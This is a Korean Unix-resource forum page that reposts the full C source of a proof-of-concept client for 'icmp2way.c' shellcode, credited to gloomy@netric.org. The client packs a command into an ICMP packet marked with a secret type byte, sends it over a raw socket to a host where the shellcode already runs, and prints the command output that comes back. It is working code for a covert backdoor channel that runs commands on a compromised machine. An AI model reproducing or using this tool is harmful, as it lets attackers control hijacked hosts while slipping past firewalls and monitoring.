BACKRUSH 유닉스명령 다음 자료실 Ascii Table 원격접속 달력,시간 프로세스 쉘

지하철노선 RFC문서 SUN FAQ SUN FAQ1 C메뉴얼 PHP메뉴얼 너구리 아스키월드 아이피서치

글쓴이: icmp

http://www.netric.org/tools/icmp_client.c

/*
-------------------------------------------------------
Simple proof of concept client for icmp2way.c shellcode
by gloomy@netric.org
-------------------------------------------------------

http://www.netric.org/tools/icmp_client.c
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip_icmp.h>

void usage(char *prog) {
fprintf(stderr,"Usage: %s <secret byte> <hostname> <command>\n",prog);
fprintf(stderr,"Example: %s 0x99 localhost \"/usr/bin/id\"\n\n",prog);
exit(0);
}

void error(char *err) {
perror(err);
exit(-1);
}

int main(int c,char *v[]) {
int fd;
int nb;
int sa_size = sizeof(struct sockaddr);
fd_set rfds;
char secret = 0;
char buf[4096];
char *data = &buf[sizeof(struct icmphdr)+8];
struct timeval tv;
struct sockaddr_in them;
struct icmphdr *hdr = (struct icmphdr *)buf;
struct hostent *host;

if (c != 4) usage(v[0]);
if ((secret = strtoul(v[1],&v[1],16)) == 0) usage(v[0]);
if ((host = gethostbyname(v[2])) == NULL) error("gethostbyname");
if ((fd = socket(AF_INET,SOCK_RAW,1)) < 0) error("socket");

them.sin_family = AF_INET;
them.sin_port = 0;
them.sin_addr = *((struct in_addr *)host->h_addr);
memset(&(them.sin_zero),0,8);

memset(buf,0,sizeof(buf));
hdr->type = secret;
hdr->code = 0;
hdr->checksum = 0xDEAD;
hdr->un.gateway = 0;

strncpy(data,v[3],1024);

if (sendto(fd,buf,sizeof(struct icmphdr)+strlen(data)+8+1,0,(struct sockaddr *)&them,sa_size)<0)
error("sendto");

FD_ZERO(&rfds);
FD_SET(fd,&rfds);
tv.tv_sec = 2;
tv.tv_usec = 0;
while (select(fd+1,&rfds,NULL,NULL,&tv)) {
if ((nb = recvfrom(fd,buf,4096,0,(struct sockaddr *)&them,&sa_size))<0)
error("recvfrom");
buf[nb] = 0;
if (buf[20] == secret+1) {
fprintf(stderr,"%s\n",&buf[21]);
}
}

close(fd);
return 0;
}